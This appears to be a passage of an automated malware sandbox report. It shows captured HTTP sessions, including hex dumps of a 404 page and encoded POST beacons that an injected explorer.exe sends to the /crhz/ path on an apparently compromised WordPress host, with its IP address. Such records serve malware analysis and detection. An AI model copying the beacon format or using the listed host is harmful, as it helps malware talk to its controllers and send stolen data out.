                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                    Jan 30, 2023 13:40:47.556543112 CET801INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                    Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                    Jan 30, 2023 13:40:47.556564093 CET802INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                    Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                    Jan 30, 2023 13:40:47.556608915 CET803INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                    Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                    Jan 30, 2023 13:40:47.556624889 CET804INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                    Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    11192.168.2.649732103.221.223.10480C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:52.993088961 CET805OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.suachuadienlanh247.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.suachuadienlanh247.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.suachuadienlanh247.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 48 41 4b 35 73 76 63 4b 48 45 61 6e 47 71 45 39 71 49 43 6a 78 6b 72 46 52 67 2d 45 69 65 57 6b 61 6f 50 4a 54 6a 77 75 34 55 62 44 63 4b 5f 64 33 78 71 56 5f 53 39 6e 46 71 69 4a 35 67 76 32 45 41 38 44 78 55 36 5a 69 33 53 42 42 75 69 70 33 53 61 59 46 35 73 6d 68 6e 56 46 33 32 6a 77 73 41 57 4b 58 4d 44 32 4b 57 45 4b 64 61 59 58 5f 6f 37 6d 53 34 2d 4a 6a 74 34 6a 72 5a 55 55 57 61 57 66 2d 67 47 6f 68 28 70 77 67 6e 7a 34 4e 6d 4b 4d 6e 4a 67 53 36 4c 36 31 55 38 42 37 75 59 74 74 73 36 71 43 39 45 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=PAqkdS49ivc9LHAK5svcKHEanGqE9qICjxkrFRg-EieWkaoPJTjwu4UbDcK_d3xqV_S9nFqiJ5gv2EA8DxU6Zi3SBBuip3SaYF5smhnVF32jwsAWKXMD2KWEKdaYX_o7mS4-Jjt4jrZUUWaWf-gGoh(pwgnz4NmKMnJgS6L61U8B7uYtts6qC9E.
                                                    Jan 30, 2023 13:40:53.424937963 CET806INHTTP/1.1 404 Not Found
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/"
                                                    content-encoding: gzip
                                                    vary: Accept-Encoding
                                                    transfer-encoding: chunked
                                                    date: Mon, 30 Jan 2023 12:40:53 GMT
                                                    server: LiteSpeed
                                                    connection: close
                                                    Data Raw: 63 66 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 1a db 6e db c8 f5 39 fe 0a 9a 46 6d 32 e1 45 94 6c cb a6 c2 24 bb 49 16 2d 90 dd 04 71 b6 8b 22 0e 82 11 39 12 c7 e6 ad 33 43 cb 8a a2 e7 3e 17 fd 82 45 9f 8b 02 45 9f 76 1f b7 3f 92 3f e9 39 43 4a a2 2e 8e 1d 67 b3 6b c3 12 79 e6 dc e7 cc b9 90 be bf fd e4 f9 e3 57 7f 79 f1 54 8b 65 9a 3c d8 ba 8f 5f 5a 42 b2 61 a0 5f 30 5d 2b 38 1d b0 cb 40 cf 87 3e 60 c8 42 f8 ae 9b 0f 0b 27 a5 6e 26 76 74 2d 4c 88 10 81 9e e4 24 62 d9 d0 16 4c 52 2d cb ed 33 a1 23 2f 4a a2 07 5b 77 ee a7 54 12 2d 8c 09 17 54 06 fa f7 af be b1 8f 74 cd c5 95 84 65 e7 1a a7 49 a0 17 3c 1f b0 84 ea 5a 0c 12 03 1d 65 81 a8 61 5a 0c 9d 9c 0f dd cb 41 e6 7a de 3a 15 08 ed 93 f0 7c 85 4c 94 24 8c 4b 50 89 66 60 4a dc de ef 3a 61 9e ba 97 69 c2 8b d0 29 e2 42 31 02 4e 22 e4 ac 90 0f 8c 41 99 85 92 e5 99 81 e6 9b 13 fc 74 94 69 df 91 94 6a 81 b6 0c 70 38 2d 12 12 52 c3 3d ed 2b 63 4f fb ae b5 77 26 f6 cc a9 69 44 79 58 a6 34 93 ce ec e2 69 42 f1 cb ec dd 77 6b 71 5b 95 47 32 60 85 5e a6 a3 22 e7 12 7c 99 67 12 10 03 7d c4 22 19 07 11 bd 60 21 b5 d5 8d a5 b1 8c 49 46 12 5b 84 24 a1 41 e5 89 fb db b6 ad 9d 50 c2 c3 58 7b 9a 0d 59 46 b5 e7 85 64 29 7b 47 d0 18 ad 3f d6 5e 12 70 d5 b7 44 c6 9a 3d df 3f e1 70 80 a6 00 54 5e 89 73 30 d1 b6 81 9d 64 32 a1 0f 5e 90 21 d5 be cb a5 f6 4d 5e 66 11 d0 9d 7c f8 f9 5f b8 7f 1f 7e fe 37 d1 fe f7 77 f6 e1 e7 bf 65 5a f2 e1 a7 1f b3 58 eb ff f2 23 08 3f 8f 73 a2 81 97 ef bb 15 8b 25 03 79 de cf a5 68 98 37 c8 93 24 1f 59 10 27 2c 8b e8 a5 ee ce f0 21 06 0a ca e5 58 85 5b 92 a3 a5 0d b2 0b f6 f6 cf df 55 76 af 63 cb 71 d1 c4 25 5c b2 10 a9 af c0 46 2d 1b e8 9f 61 f2 55 22 f0 24 bc 45 07 34 c4 dc 8a 6b e5 44 39 62 52 52 ee 87 84 47 0d 8e a2 4c 53 c2 c7 6f 13 c2 87 f4 2d 4b c1 8e 2b 49 7f 75 a3 ab 68 d6 d0 f5 e0 f1 a2 48 58 a8 e2 ce 4d a2 7b 67 22 cf e6 d9 01 c3 cd c6 78 83 e8 8d 69 4a f4 07 13 fd 91 d2 e3 52 ea be 3e 8f 4b b5 88 c7 5d b7 f4 47 43 4e 8a 58 f7 5f 03 aa da 5c 5f 7f 41 39 72 85 35 16 35 c9 36 1f f6 9d 62 86 ae 76 c1 d7 49 94 b2 4c 9f 5a 0b 86 3f d0 fe 09 6c d3 8d 39 8e 68 5f 54 f8 25 4f ae c5 5f 48 3e 39 2d 3d 4a 23 f4 ad ba 1a 10 ed b4 6c 79 9e c7 f0 36 ec 82 97 f1 82 78 e8 68 58 69 51 af e9 6c 4b 2f ca 7e c2 44 4c b9 ee 4f 3e cd fa a9 a5 b3 ec 19 a4 f3 12 43 c3 c7 9c de f4 c0 d7 1c 52 74 c8 cb b4 ff 8c 09 39 77 c4 4e 7f 0e 07 18 98 9c e2 72 9d c8 96 f6 04 e1 7f 82 75 54 32 07 e7 c0 f6 03 d4 ab a9 6e aa ee c2 55 7f 84 64 a4 4f a7 6f 56 b6 09 63 75 a1 1d ec 43 51 01 aa 7d 58 90 af c7 f4 e7 ba 9e 89 17 90 4c 9e 0f 6e ee f9 59 94 6c 70 bd a5 37 1c 3b 67 d8 f4 36 9a de a8 13 98 e0 dd 45 0e ff 21 e7 d1 0b 4e 85 d0 4e 9e 3e d7 8a a4 84 9c af 52 f7 d6 a2 26 ee 45 99 b0 b1 6c 53 19 c6 7b 55 5d dc bb 4a db 3d 75
                                                    Data Ascii: cf3n9Fm2El$I-q"93C>EEv??9CJ.gkyWyTe<_ZBa_0]+8@>`B'n&vt-L$bLR-3#/J[wT-TteI<ZeaZAz:|L$KPf`J:ai)B1N"Atijp8-R=+cOw&iDyX4iBwkq[G2`^"|g}"`!IF[$APX{YFd){G?^pD=?pT^s0d2^!M^f|_~7weZX#?s%yh7$Y',!X[Uvcq%\F-aU"$E4kD9bRRGLSo-K+IuhHXM{g"xiJR>K]GCNX_\_A9r556bvILZ?l9h_T%O_H>9-=J#ly6xhXiQlK/~DLO>CRt9wNruT2nUdOoVcuCQ}XLnYlp7;g6E!NN>R&ElS{U]J=u
                                                    Jan 30, 2023 13:40:53.424966097 CET808INData Raw: 90 af a3 0d a3 cc 39 13 11 4d d8 05 77 32 2a 57 a9 56 29 3e 5e 85 47 85 5d e7 20 57 c2 81 a7 c2 1d 24 44 0a d8 78 17 b2 05 95 c2 3d 13 2e 10 66 e7 80 5e 66 b2 2c 40 f8 c3 0b ca 83 8e e3 1d 3a 07 bf 99 74 01 35 e4 7c 0c 3d 4d 44 fb 84 ff 4e 4a c8
                                                    Data Ascii: 9Mw2*WV)>^G] W$Dx=.f^f,@:t5|=MDNJ<O$+$fQ!(l7B'P%dCM,j{#YaI?_"?3rfzT{cvGQAP'z}bi S
                                                    Jan 30, 2023 13:40:53.424988031 CET809INData Raw: 84 9f 53 6e 7b 2d 64 77 d8 27 de b5 88 73 c6 2d 48 8a 87 d7 e1 b7 15 e3 03 72 d4 bd 16 71 c6 f8 18 78 77 0e 9a e8 55 ac 54 8f 67 ed 01 84 ad f0 a1 7c 4e 1f a5 34 62 44 33 ec 11 ed 9f 33 69 23 6a fd 24 b7 60 97 34 b1 39 b6 f7 7e 1b ce 14 2e c1 30
                                                    Data Ascii: Sn{-dw's-HrqxwUTg|N4bD33i#j$`49~.0'%J;nG3'k s@V/IXrP6`smc,)I|]CqD!^ !9"+NVt::~LFP7pf,LJ3;~RRl3D
                                                    Jan 30, 2023 13:40:53.432383060 CET810INData Raw: 35 63 61 0d 0a dc 5b 5f 73 e2 36 10 ff 2a 1a f2 40 ef 62 39 b2 8c 0d 0e 33 e9 80 c1 bd 3c 34 93 84 e6 a6 ed 9b 13 20 38 71 6c 0e 3b 21 29 c3 77 ef ae 24 1b f3 27 39 e2 69 8e 1e 71 c6 66 ad 45 2b fd b4 5a ed 6a c5 36 36 43 14 fc 17 46 83 de 60 22
                                                    Data Ascii: 5ca[_s6*@b93<4 8ql;!)w$'9iqfE+Zj66CF`"B.(+y*t;{[=0SuC_RL;<lbl[nf)-rY&2yeDvP_RFRPjzN(tBQ"tQ5'i.2i
                                                    Jan 30, 2023 13:40:53.432414055 CET810INData Raw: e1 7a 6a 3d 11 03 c5 5d 58 d5 b9 2b ed 68 ab ce c1 f6 d5 73 bd 16 60 ef 05 d0 56 66 f7 2e de 01 33 43 98 99 44 94 19 a6 52 52 0b b5 dc 92 5a ce db 6d 18 88 b6 2b 09 d7 96 cf 4e 4b 3d 5d b5 04 e1 18 d8 6a 60 ea 35 35 16 b2 d0 e0 5c 3e 1d b5 cc 3b
                                                    Data Ascii: zj=]X+hs`Vf.3CDRRZm+NK=]j`55\>;rX@=-@fP3>Fg+ct_<`o KtG]N+E(?M:sUw,]DvYw53;_
                                                    Jan 30, 2023 13:40:53.435611963 CET812INData Raw: 37 37 31 0d 0a ec 5d dd 6f db 36 10 7f 8e ff 8a 83 8a 0e 2b 50 c9 96 2d f9 a3 b5 8d 35 dd 5a f4 a1 7b 68 ba be 0c 43 20 c7 b2 a2 56 96 04 c9 ae 93 01 fb df 77 77 fc 10 65 d9 99 1d b4 41 b1 38 45 61 5b bc 3b f2 c8 23 79 22 f9 3b ea 45 d7 b6 08 1e
                                                    Data Ascii: 771]o6+P-5Z{hC VwweA8Ea[;#y";E$EVx,ZY>6Gd|,;b,{xSt%E<Xt~Y XMW>uJKk$ehA:i+I!mx',>+/{*&y(ELr^Fc
                                                    Jan 30, 2023 13:40:53.435642958 CET812INData Raw: 3c d3 e4 10 55 27 d9 70 7a de 55 13 8a 85 a7 42 82 8c 91 35 79 9e e7 0f bb 6e d5 f7 64 02 98 65 80 1b b7 03 cb b9 4d 1f 49 c4 1f b7 3e 3f a1 0f 7c 42 1f 45 28 02 73 ed 1b 70 39 ef 79 b0 0a ec 20 8d d1 5d 64 df 77 1e be 4b ff c0 fe b9 47 2d 5d 4c
                                                    Data Ascii: <U'pzUB5yndeMI>?|BE(sp9y ]dwKG-]LSW3]vLq7Sh&hAB3wB*d .3t@B]5VOd"eqDHZOvno=6%>~#S:q-cd88
                                                    Jan 30, 2023 13:40:53.446582079 CET814INData Raw: 35 64 32 0d 0a ec 5d 4b 6f db 46 10 3e cb bf 62 a1 43 72 31 2d 4b b6 d3 3c 1d 24 4e 83 04 88 9b 20 30 d0 a3 41 4a b4 44 44 22 55 91 74 ac de 72 ee a9 c7 a0 17 3b 41 90 4b 03 04 c9 a1 80 7d e8 81 40 fe 87 fe 49 e7 b1 4f 92 92 e5 b4 40 d3 c2 07 5b
                                                    Data Ascii: 5d2]KoF>bCr1-K<$N 0AJDD"Utr;AK}@IO@[r9U]!JrG~QRD!*3OdpQ0StI))7b.jVM%14T/.E\O>Pfgd*/'#
                                                    Jan 30, 2023 13:40:53.446629047 CET814INData Raw: e5 e4 7f 5b 4d 5b a5 8c a1 a6 e0 a6 e4 c7 3e 55 73 cd 46 84 59 a5 a6 49 0e ca 13 e7 a0 4e 24 88 ab 42 63 b7 aa 7b 6f 7f 9f d0 3d cf b6 79 83 ce f6 3d 60 15 30 0d 9c 37 f8 62 99 63 43 d9 97 35 bc 61 94 66 d5 e2 e6 76 c3 f6 46 af 9e 33 9f 3b eb 9d
                                                    Data Ascii: [M[>UsFYIN$Bc{o=y=`07bcC5afvF3;zuu{oPkWem,h70|;~IT@xWW)cxk@Q[Vs>|PtE;bOpsjO)ACfPZ=~
                                                    Jan 30, 2023 13:40:53.446661949 CET815INData Raw: 32 32 37 0d 0a 04 b7 26 6a 87 26 ea 8a eb 75 a9 bd b6 9e 9c a5 08 fb 29 33 4d 2a 48 2e 02 58 d7 e4 59 d6 fa 83 82 72 8c 1d 44 47 25 28 bb aa 1b 8c d2 1d a3 a7 58 e7 e4 ce 7d 96 76 0e c8 b3 6d 49 24 04 61 26 9e 94 5b 87 c8 de 24 87 41 cc 8a 37 23
                                                    Data Ascii: 227&j&u)3M*H.XYrDG%(X}vmI$a&[$A7#.e?q(n*?@bU1,>!U1VCdkt]Wl}'w)~ R_4&~SNDtUNk?F3;z@8Q^kb$l
                                                    Jan 30, 2023 13:40:53.716959000 CET816INData Raw: 36 33 30 0d 0a ec 5d db 6e db 38 10 7d de 7e 85 b0 c5 a2 d6 42 35 44 ea ee 00 fb b8 ff 21 db ca 05 9b c4 41 ec a4 6e 8d fd f7 9d 19 ea ae a1 48 49 ce c3 02 29 d2 a2 a1 86 e7 90 c3 d1 48 e4 50 9c ce 0a e1 e1 e4 fc 8d 53 ff 69 5b c4 41 6d 93 37 89
                                                    Data Ascii: 630]n8}~B5D!AnHI)HPSi[Am7n3/nK/>}###Voj2p*h{l{9(%$KxE3P\:bKH}|s4KU)QDM7kU


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    12192.168.2.649733103.221.223.10480C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:55.823978901 CET819OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.suachuadienlanh247.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.suachuadienlanh247.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.suachuadienlanh247.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 6d 77 4b 28 4c 54 63 44 48 45 56 73 6d 71 45 6d 36 49 65 6a 78 67 72 46 51 6b 75 45 77 79 57 6a 4a 51 50 49 78 4c 77 69 59 55 62 57 4d 4b 37 51 58 78 38 56 5f 76 47 6e 45 61 59 4a 36 4d 76 77 6e 34 38 46 30 49 37 53 79 33 51 46 42 75 6c 70 33 53 31 59 42 64 7a 6d 67 53 49 46 7a 61 6a 77 61 63 57 4e 6e 4d 41 7a 4b 57 45 4b 64 61 55 58 5f 6f 54 6d 57 55 6d 4a 6a 46 6f 6a 38 68 55 55 79 4f 57 64 64 59 46 68 42 7e 42 34 41 6d 33 31 73 50 64 47 57 73 5a 5a 4b 43 59 70 46 4d 57 77 4f 6b 6b 35 2d 37 68 62 34 75 5f 70 53 42 68 50 6d 75 73 50 44 71 5f 4a 4f 67 41 79 70 37 35 41 4f 59 7a 77 79 76 45 35 37 64 36 37 71 61 46 74 6d 6e 4d 67 58 32 49 62 43 54 2d 28 34 4e 76 39 53 47 56 41 67 68 35 35 53 6c 34 71 45 4e 6d 33 48 34 4c 77 49 5a 41 7e 63 4b 74 64 39 56 4f 31 6a 44 5a 79 33 7e 68 31 64 72 71 76 56 72 7a 34 41 59 2d 30 42 48 36 57 43 7e 5f 53 43 6b 39 6e 38 78 61 70 57 6b 58 33 79 62 6d 34 52 74 5f 5a 75 72 63 6a 4c 30 32 45 5a 43 67 70 6f 36 38 6a 6d 33 73 59 62 6f 35 69 6d 75 5f 48 78 67 4f 33 6b 67 4c 59 63 44 63 33 4c 30 59 54 6e 4a 57 38 38 46 31 38 4b 38 64 78 2d 4a 76 77 37 44 4c 4b 71 46 7a 37 56 58 62 58 66 7a 59 78 55 6b 47 57 55 46 71 46 68 6f 55 53 63 5a 46 64 64 54 72 36 46 77 37 65 31 37 5a 78 67 61 4a 72 48 4d 4c 77 32 30 69 4e 66 65 71 7a 50 65 54 4a 62 49 6e 31 69 70 46 56 6c 64 6e 7e 59 44 74 64 4c 6a 4c 32 30 6a 33 5a 4b 6b 6f 44 30 37 59 43 54 46 6a 4c 5a 54 70 61 33 78 43 32 69 56 59 54 5f 58 4c 41 39 55 59 7e 45 73 75 68 63 52 43 31 6f 76 57 6a 48 41 6a 31 62 55 75 49 33 54 77 69 31 76 65 48 50 45 7a 38 59 55 70 63 52 76 6b 57 6b 33 50 79 30 69 55 79 64 34 59 4a 39 50 6f 6c 54 77 32 41 4b 42 4a 28 6d 53 73 70 53 55 45 4d 64 45 30 30 69 47 37 59 67 4d 6f 32 65 4f 6b 63 6d 70 75 6d 4d 6e 32 38 6d 6d 51 68 2d 72 61 6f 34 6d 47 77 32 74 44 30 77 28 57 30 64 58 37 46 6e 5a 6e 37 7a 7a 61 77 69 48 36 47 74 79 36 4c 6f 58 70 35 6f 64 72 73 6f 45 52 62 75 53 4e 31 52 7e 4e 73 4a 71 45 50 66 34 54 37 6c 75 66 47 72 58 62 56 70 35 6c 63 4a 66 6e 4d 58 71 45 30 38 35 6c 35 76 28 68 42 6a 44 35 54 35 41 36 42 62 78 59 66 78 58 4b 64 5f 58 50 43 51 59 7a 4d 51 7a 76 4a 48 4c 76 53 41 6e 55 33 78 35 4b 4a 6a 4f 63 63 68 51 7a 57 72 46 4a 6c 55 4e 74 46 6e 31 52 41 37 48 4a 56 33 76 71 43 37 62 63 33 33 50 79 56 47 71 51 75 67 59 73 38 51 59 66 4d 77 7a 74 6f 66 77 77 43 6c 6f 63 69 34 6e 76 4e 56 34 33 51 78 72 71 70 50 53 71 38 77 68 75 34 37 31 72 59 67 58 5a 72 7a 74 37 64 52 44 63 4c 79 6b 76 5a 74 66 6d 72 47 65 7a 33 73 67 52 65 78 6a 56 30 64 4c 63 5a 4b 71 62 54 50 77 52 67 61 70 63 48 78 45 56 72 54 42 36 37 58 6e 36 34 6b 34 2d 71 45 70 65 56 52 50 75 6c 36 32 6a 6b 4d 49 79 32 56 62 4f 45 39 65 32 43 45 33 4e 75 62 4d 55 6c 7a 63 62 78 72 41 43 67 73 71 47 36 44 6b 35 51 74 74 36 73 71 79 4a 4c 76 37 47 50 68 63 6e 47 57 63 46 59 45 44 37 73 58 6b 6d 6c 4f 65 30 31 63 67 6d 35 51 71 68 55 30 4e 41 39 62 67 68 54 6f 56 63 36 39 58 33 42 58 35 54 31 58 38 6e 74 4c 55 55 44 74 42 67 52 4c 35 4f 70 30 57 4d 33 59 50 33 6a 6b 62 63 6c 47 56 63 79 37 49 42 70 5f 70 39 6e 78 33 79 4b 34 71 4c 55 39 6b 2d 4e 52 4a 48 30 74 6f 70 43 63 6b 33 28 77 6e 76 38 34 61 49 31 46 30 56 44 33 4a 74 35 6c 28 41 74 39 58 42 4d 4f 4a 35 64 45 52 36 65 59 57 62 43 43 50 35 73 75 71 45 42 66 63 37 31 66 70 49 41 66 58 65 50 52 76 54 75 52 75 55 49 51 4f 63 57 77 77 79 28 35 50 58 4a 6d 30 4f 64 53 69 79 51 36 39 45 6f 52 44 7a 59 71 75 46 4a 61 55 76 71 76 70 4a 4a 6a 28 49 4b 37 62 7a 50 30 55 